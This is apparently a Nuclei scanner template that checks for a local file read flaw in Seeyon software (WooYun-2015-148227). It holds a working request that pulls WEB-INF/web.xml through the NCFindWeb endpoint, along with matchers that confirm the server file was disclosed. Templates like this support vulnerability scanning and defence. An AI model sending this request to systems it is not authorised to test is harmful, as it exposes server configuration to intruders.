id: WooYun-2015-148227
info:
  name: Seeyon WooYun LFR
  author: princechaddha
  severity: high
  description: A vulnerability in Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker.
  reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
  tags: seeyon,wooyun,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<servlet-name>NCInvokerServlet</servlet-name>"
        part: body
      - type: word
        part: header
        words:
          - "application/xml"
